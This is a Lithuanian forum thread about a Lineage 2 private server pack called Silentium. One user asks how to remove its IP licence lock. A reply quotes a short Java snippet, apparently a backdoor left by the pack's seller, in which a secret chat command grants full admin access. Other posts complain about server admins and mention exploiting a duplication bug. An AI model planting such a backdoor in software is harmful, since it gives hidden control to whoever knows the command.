| Registruotis Prisijungti Forumas Ieškoti DUK |
Silentium pack ip blockas?
10 pranešimai(ų)
• Puslapis 1 iš 1
Silentium pack ip blockas?
Kai bandau paleist serva su silentium pack, man rodo kad naudoju nelegalia versija silentium packo. čia kiek zinau yra ip blockas. Gal kas gali padet istrynt?
Re: Silentium pack ip blockas?
l2sp rašė:Jei sugebėsi nusilauši IP apsaugą, sekmės ieškant backdoor
Tavo backdoor
else if ("number69".equalsIgnoreCase(command))
{
player.setAccessLevel(1);
player.setAccountAccesslevel(100);
player.sendMessage("You gave admin acces.");
return true;
}
return false;
Tu katik pats issidavei , kad pardavinedamas visiems savo failus ikisi ir backdoor ....
Tai jo, pgr adminas niekada neprisijungia prie servo o event gm net nezino ka daro, nusipirkes is pgr admino gm ir veda 'eventus'.
Servas butu geras jeigu tie adminai nebutu tokie, kad niekada nieko nekeicia.
Man buvo sakes draugas kad tipo daug ka pakeis kai losem praeita wipe, o ka jis pakeite? - armorus, daugiau nieko
Servas butu geras jeigu tie adminai nebutu tokie, kad niekada nieko nekeicia.
Man buvo sakes draugas kad tipo daug ka pakeis kai losem praeita wipe, o ka jis pakeite? - armorus, daugiau nieko
Tai jis net nesugeba phx apsaugu supirkt, nors is donate gauna nemazai, labai daug vaikezu ten tuos vistos sparnus perka ir pns slamsta
. Bugu pilna, antra servo gyvavimo diena is 1 bog padariau 1kkk, o ten elementariausias doop bugus, kuris neveikia 99.99% servuose. :/
Servas turi gera potenciala, tiesiog tie adminai nieko nedaro. Patvarkytum serva normaliai, butu zjbs servas.
Del tu gm tai man *Cerberus* buvo uzmetes ant +45 lanko kuris turejo passive p.atk +3, nors 1 pliusas uzdeda 5, tipo as tiek turejau.. Graudus
Del tu gm tai man *Cerberus* buvo uzmetes ant +45 lanko kuris turejo passive p.atk +3, nors 1 pliusas uzdeda 5, tipo as tiek turejau.. Graudus
10 pranešimai(ų)
• Puslapis 1 iš 1
Dabar prisijungę
Vartotojai naršantys šį forumą: Google [Bot] ir 0 svečių

EN